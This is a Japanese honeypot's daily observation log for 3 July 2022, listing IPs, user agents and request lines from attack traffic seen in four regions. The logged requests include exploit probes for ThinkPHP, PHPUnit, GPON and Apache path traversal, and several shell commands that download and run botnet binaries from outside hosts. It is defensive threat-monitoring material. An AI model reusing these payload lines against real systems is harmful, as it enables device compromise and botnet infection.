ハニーポット(仮) 観測記録 2022/07/03分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
Spring Cloud Gatewayの脆弱性(CVE-2022-22947)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為

Location:JP

JBossの脆弱性を狙うアクセス
/.awsへのスキャン行為
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為
UserAgentがHello, worldであるアクセス

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget 0.0.0.0/jaws;
sh /tmp/jaws

cd /tmp;
rm -rf *;
wget http://137.184.210.50/bins/aqua.mpsl;
sh /tmp/aqua.mpsl

Location:US

/.gitへのスキャン行為
WordPressへのスキャン行為

を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget  91.218.67.131/reaper/reap.arm4;
chmod 777 /tmp/reap.arm4;
sh /tmp/reap.arm4

Location:UK

D-link製品の脆弱性を狙うアクセス
JBossの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
/.gitへのスキャン行為
Apache Tomcatへのスキャン行為

を確認しました。

Location:SG

D-link製品の脆弱性を狙うアクセス
phpMyAdminへのスキャン行為

を確認しました。

他

アクセス数推移

JP：総アクセス数：212 (前日比：136)
US：総アクセス数：65 (前日比：-93)
UK：総アクセス数：50 (前日比：-576)
SG：総アクセス数：43 (前日比：-37)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
8	3.91.217.226	United States
1	20.242.94.128	United States
1	31.222.238.247	Moldova
1	34.239.143.119	United States
101	35.89.225.100	United States
39	54.80.14.65	United States
1	85.130.92.41	Bulgaria
1	92.185.230.54	Spain
1	92.255.85.183	Hong Kong
16	95.214.235.205	Ukraine
1	104.217.249.182	United States
2	109.237.103.9	Russia
1	122.194.205.46	China
8	135.125.217.54	France
7	135.125.244.48	France
1	161.35.142.70	United States
2	161.35.142.105	United States
11	185.7.214.104	Hong Kong
2	185.102.170.250	Netherlands
4	185.142.236.41	Seychelles
1	193.46.255.26	Romania
1	205.210.31.141	United States
1	222.80.76.212	China

UserAgent一覧

件数	UserAgent
7	-
2	Hello, world
1	Mozila/5.0
1	Mozilla/2.02E (Win95; U)
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
39	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
8	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
36	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
9	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36
1	nvdorz
92	python-requests/2.28.1

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x03
1		\x16\x03\x01\x01D\x01
1		\x16\x03\x01
1	GET	/%25EXT%25.php	HTTP/1.1
1	GET	/.aws/credentials	HTTP/1.1
1	GET	/.env.bak	HTTP/1.1
36	GET	/.env	HTTP/1.1
1	GET	/.git/config	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/1.php	HTTP/1.1
1	GET	/123.php	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>	HTTP/1.1
1	GET	/?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=2m5c2lwt	HTTP/1.1
1	GET	/Black.php	HTTP/1.1
1	GET	/Server.php	HTTP/1.1
1	GET	/__test.php	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/_profiler/phpinfo	HTTP/1.1
1	GET	/a.php	HTTP/1.1
1	GET	/actuator/gateway/routes	HTTP/1.1
1	GET	/admin.php3	HTTP/1.1
1	GET	/admin.php	HTTP/1.1
1	GET	/admin/.env	HTTP/1.1
1	GET	/admin/ajax.php?module=recordings	HTTP/1.0
1	GET	/adminphp.php	HTTP/1.1
1	GET	/amministratore.php	HTTP/1.1
1	GET	/api.php	HTTP/1.1
1	GET	/api/.env	HTTP/1.1
1	GET	/app/.env	HTTP/1.1
1	GET	/application/.env	HTTP/1.1
1	GET	/apps/.env	HTTP/1.1
1	GET	/asdf.php	HTTP/1.1
1	GET	/auth/.env	HTTP/1.1
1	GET	/back/.env	HTTP/1.1
1	GET	/backend/.env	HTTP/1.1
1	GET	/cgi-bin/printenv.pl	HTTP/1.1
1	GET	/check.php	HTTP/1.1
1	GET	/cli/.env	HTTP/1.1
1	GET	/conf.inc.php~	HTTP/1.1
1	GET	/conf.php.old	HTTP/1.1
1	GET	/conf.php.swp	HTTP/1.1
1	GET	/config.json	HTTP/1.1
1	GET	/config/.env	HTTP/1.1
1	GET	/configuration.php	HTTP/1.1
1	GET	/conflg.php	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/core/.env	HTTP/1.1
1	GET	/cp/.env	HTTP/1.1
1	GET	/dashboard/phpinfo.php	HTTP/1.1
1	GET	/debug/default/view?panel=config	HTTP/1.1
1	GET	/dependencies/.env	HTTP/1.1
1	GET	/deployment/.env	HTTP/1.1
1	GET	/dev.php	HTTP/1.1
1	GET	/dev/.env	HTTP/1.1
1	GET	/development/.env	HTTP/1.1
1	GET	/docker/.env	HTTP/1.1
1	GET	/document/.env	HTTP/1.1
1	GET	/engine/.env	HTTP/1.1
1	GET	/env.php	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/framework/.env	HTTP/1.1
1	GET	/frontend/.env	HTTP/1.1
1	GET	/frontend_dev.php/$	HTTP/1.1
1	GET	/i.php	HTTP/1.1
1	GET	/index-test.php	HTTP/1.1
1	GET	/index.php3	HTTP/1.1
1	GET	/index.php4	HTTP/1.1
1	GET	/index.php5	HTTP/1.1
1	GET	/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index2.php	HTTP/1.1
1	GET	/index3.php	HTTP/1.1
2	GET	/info.php	HTTP/1.1
2	GET	/infophp.php	HTTP/1.1
1	GET	/infos.php	HTTP/1.1
1	GET	/invoker/readonly	HTTP/1.1
1	GET	/isadmin.php	HTTP/1.1
1	GET	/jenkins/login	HTTP/1.1
2	GET	/jo.php	HTTP/1.1
1	GET	/laravel-artisa/.env	HTTP/1.1
1	GET	/laravel/.env	HTTP/1.1
1	GET	/lindex.php	HTTP/1.1
1	GET	/linusadmin-phpinfo.php	HTTP/1.1
1	GET	/local/.env	HTTP/1.1
1	GET	/login/.env	HTTP/1.1
1	GET	/login/	HTTP/1.1
1	GET	/login	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
1	GET	/master/.env	HTTP/1.1
1	GET	/new.php	HTTP/1.1
1	GET	/old_phpinfo.php	HTTP/1.1
1	GET	/p.php	HTTP/1.1
1	GET	/personal/.env	HTTP/1.1
1	GET	/php-backdoor.php	HTTP/1.1
1	GET	/php-info.php	HTTP/1.1
1	GET	/php.ini	HTTP/1.1
1	GET	/php.php	HTTP/1.1
1	GET	/php1.php	HTTP/1.1
1	GET	/php_info.php	HTTP/1.1
1	GET	/phpinfo.php3	HTTP/1.1
1	GET	/phpinfo.php4	HTTP/1.1
1	GET	/phpinfo.php5	HTTP/1.1
2	GET	/phpinfo.php	HTTP/1.1
2	GET	/phpinfo	HTTP/1.1
1	GET	/phpinfos.php	HTTP/1.1
1	GET	/phpstudy.php	HTTP/1.1
1	GET	/phptest.php	HTTP/1.1
1	GET	/phpversion.php	HTTP/1.1
1	GET	/pi.php5	HTTP/1.1
1	GET	/pi.php	HTTP/1.1
1	GET	/pinfo.php	HTTP/1.1
1	GET	/pop_profile.php	HTTP/1.1
1	GET	/private/.env	HTTP/1.1
1	GET	/project/.env	HTTP/1.1
1	GET	/protected/.env	HTTP/1.1
1	GET	/qq.php	HTTP/1.1
1	GET	/rest/.env	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/s.php	HTTP/1.1
1	GET	/sa.php	HTTP/1.1
1	GET	/sa2.php	HTTP/1.1
1	GET	/script	HTTP/1.1
1	GET	/search/.env	HTTP/1.1
1	GET	/server/.env	HTTP/1.1
1	GET	/shared/.env	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+0[.]0[.]0[.]0/jaws;sh+/tmp/jaws	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//137[.]184[.]210[.]50/bins/aqua.mpsl;sh+/tmp/aqua.mpsl	HTTP/1.1
1	GET	/simple-backdoor.php	HTTP/1.1
1	GET	/site/.env	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/src/.env	HTTP/1.1
1	GET	/status.php	HTTP/1.1
1	GET	/sypex.php	HTTP/1.1
1	GET	/system/.env	HTTP/1.1
1	GET	/temp.php	HTTP/1.1
1	GET	/test.php	HTTP/1.1
1	GET	/test0.php	HTTP/1.1
1	GET	/test1.php	HTTP/1.1
1	GET	/test123.php	HTTP/1.1
1	GET	/test1	HTTP/1.1
1	GET	/test2.php	HTTP/1.1
1	GET	/test2	HTTP/1.1
1	GET	/test3.php	HTTP/1.1
1	GET	/test4.php	HTTP/1.1
1	GET	/test5.php	HTTP/1.1
1	GET	/test6.php	HTTP/1.1
1	GET	/test7.php	HTTP/1.1
1	GET	/test8.php	HTTP/1.1
1	GET	/test9.php	HTTP/1.1
1	GET	/test_ip.php	HTTP/1.1
1	GET	/testphp.php	HTTP/1.1
1	GET	/time.php	HTTP/1.1
1	GET	/up.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/view.php	HTTP/1.1
1	GET	/vue/.env	HTTP/1.1
1	GET	/w.php	HTTP/1.1
1	GET	/web/.env	HTTP/1.1
1	GET	/webmaster.php	HTTP/1.1
1	GET	/weixiao.php	HTTP/1.1
1	HEAD	/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/_ignition/execute-solution	HTTP/1.1
3	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh	HTTP/1.1
1	POST	/editBlackAndWhiteList	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.213.238.131	United States
2	20.229.115.156	United States
1	20.239.189.122	United States
2	24.182.233.122	United States
1	31.222.238.247	Moldova
2	34.239.143.119	United States
1	45.164.23.148	Mexico
7	51.79.29.48	Canada
1	92.255.85.183	Hong Kong
16	93.115.26.170	Lithuania
1	104.217.249.182	United States
1	159.89.174.51	United States
1	161.35.142.70	United States
1	162.142.125.210	United States
2	165.232.147.215	United States
11	185.7.214.104	Hong Kong
2	185.102.170.250	Netherlands
5	185.213.175.159	Spain
7	185.254.196.223	Ukraine

UserAgent一覧

件数	UserAgent
8	-
2	Mozila/5.0
1	Mozilla/5.0 (Linux; Android 11; SM-A515F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Mobile Safari/537.36
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
16	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
2	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
1	Mozilla/5.0 (X11; CrOS x86_64 14588.98.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.59 Safari/537.36
18	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x03
1		\x16\x03\x01\x02
1		{\"id\":1,\"jsonrpc\":\"2.0\",\"method\":\"login\",\"params\":{\"login\":\"49yZYiE3R2nhxN2GtgVU2k2qHAUynMpdz6aqhP7DrKCtSgqGBnaqZ9w45bQHZvy5zYSP6AzVHk67FAjJrUzc7ZVUAc11DGa\",\"pass\":\"x\",\"agent\":\"XMRig/6.15.3	(Windows NT 10.0; Win64; x64) libuv/1.42.0 msvc/2019\",\"algo\":[\"cn/1\",\"cn/2\",\"cn/r\",\"cn/fast\",\"cn/half\",\"cn/xao\",\"cn/rto\",\"cn/rwz\",\"cn/zls\",\"cn/double\",\"cn/ccx\",\"cn-lite/1\",\"cn-heavy/0\",\"cn-heavy/tube\",\"cn-heavy/xhv\",\"cn-pico\",\"cn-pico/tlo\",\"cn/upx2\",\"rx/0\",\"rx/wow\",\"rx/arq\",\"rx/graft\",\"rx/sfx\",\"rx/keva\",\"argon2/chukwa\",\"argon2/chukwav2\",\"argon2/ninja\",\"astrobwt\"]}}\n
1		{\"id\":1,\"method\":\"eth_submitLogin\",\"worker\":\"eth1.0\",\"params\":[\"0x39ab0a1631185dd0a25bdf60df706389cf9001ed\",\"x\"],\"jsonrpc\":\"2.0\"}\n
1		{\"id\":	1, \"method\": \"mining.subscribe\", \"params\": [\"cpuminer/2.5.1\"]}\n
1		{\"id\":	1, \"method\": \"mining.subscribe\", \"params\": [\"MinerName/1.0.0\", \"EthereumStratum/1.0.0\"]}\n
19	GET	/.env	HTTP/1.1
2	GET	/.git/config	HTTP/1.1
1	GET	/2020/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/gateway/routes	HTTP/1.1
1	GET	/blog/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/cms/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21	HTTP/1.1
1	GET	/login/	HTTP/1.1
1	GET	/news/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+ 91.218.67.131/reaper/reap.arm4;chmod+777+/tmp/reap.arm4;sh+/tmp/reap.arm4
1	GET	/shop/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/site/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/sito/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/test/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/web/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/website/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wordpress/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp-content/	HTTP/1.1
1	GET	/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp1/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp2/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/xmlrpc.php?rsd	HTTP/1.1
2	HEAD	/cdn-cgi/trace	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
3	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh	HTTP/1.1
2	POST	/editBlackAndWhiteList	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	PRI	*	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	20.187.87.43	United States
6	20.213.234.55	United States
1	31.222.238.247	Moldova
8	54.215.93.145	United States
1	66.240.192.82	United States
1	95.130.176.18	Russia
1	104.217.249.182	United States
2	109.237.103.9	Russia
1	117.222.187.171	India
1	121.147.79.3	South Korea
1	125.41.186.100	China
2	157.230.216.203	United States
1	162.142.125.213	United States
1	172.104.138.223	United States
1	182.113.3.255	China
1	183.136.225.42	China
11	185.7.214.104	Hong Kong
1	185.102.170.250	Netherlands
4	185.142.236.41	Seychelles
1	194.62.157.203	Netherlands
1	198.235.24.130	United States
1	205.210.31.141	United States
1	222.80.76.212	China

UserAgent一覧

件数	UserAgent
17	-
1	Mozila/5.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36
8	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
1	Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
1	Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
2	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1	Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x16\x03\x01\x01D\x01
3		\x16\x03\x01
1	CONNECT	api4.my-ip[.]io:443	HTTP/1.1
1	CONNECT	api6.my-ip[.]io:443	HTTP/1.1
1	CONNECT	www.proxy-listen[.]de:443	HTTP/1.1
3	GET	/.env	HTTP/1.1
1	GET	/.git/config	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>	HTTP/1.1
1	GET	/?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=hgbwsp30	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/ab2g	HTTP/1.1
1	GET	/ab2h	HTTP/1.1
1	GET	/actuator/gateway/routes	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=admin&psd=admin	HTTP/1.0
1	GET	/console/	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/fuN3	HTTP/1.0
1	GET	/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21	HTTP/1.1
1	GET	/invoker/readonly	HTTP/1.1
1	GET	/jenkins/login	HTTP/1.1
1	GET	/login/	HTTP/1.1
1	GET	/login	HTTP/1.1
1	GET	/manager/html	HTTP/1.1
2	GET	/robots.txt	HTTP/1.1
1	GET	/script	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//125[.]41[.]186[.]100:39375/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	http[:]//azenv[.]net/	HTTP/1.1
1	GET	http[:]//v4[.]ipv6-test.com/json/widgetdata.php?callback=?	HTTP/1.1
1	GET	http[:]//v6[.]ipv6-test.com/json/widgetdata.php?callback=?	HTTP/1.1
1	HEAD	/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
1	POST	/_ignition/execute-solution	HTTP/1.1
2	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh	HTTP/1.1
1	POST	/editBlackAndWhiteList	HTTP/1.1
2	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	PRI	*	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
2	49.234.55.252	China
11	51.79.29.48	Canada
1	66.240.192.82	United States
1	104.217.249.182	United States
2	109.237.103.9	Russia
1	122.156.83.107	China
1	156.96.154.40	United States
1	161.35.142.105	United States
1	172.245.21.147	United States
11	185.7.214.104	Hong Kong
2	185.102.170.250	Netherlands
8	185.254.196.223	Ukraine
1	198.235.24.13	United States

UserAgent一覧

件数	UserAgent
3	-
1	Hakai/2.0
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2	Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
23	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x16\x03\x01\x01D\x01
2		\x16\x03\x01
22	GET	/.env	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php>	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/gateway/routes	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/laravel/.env	HTTP/1.1
1	GET	/login.cgi?cli=aa%20aa%27;wget%20http[:]//134[.]195[.]138[.]33/.nCKx/zx.mips%20-O%20-%3E%20/tmp/kh;/tmp/kh%20selfrep.dlink%27$	HTTP/1.1
1	GET	/phpmyadmin/index.php	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
3	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1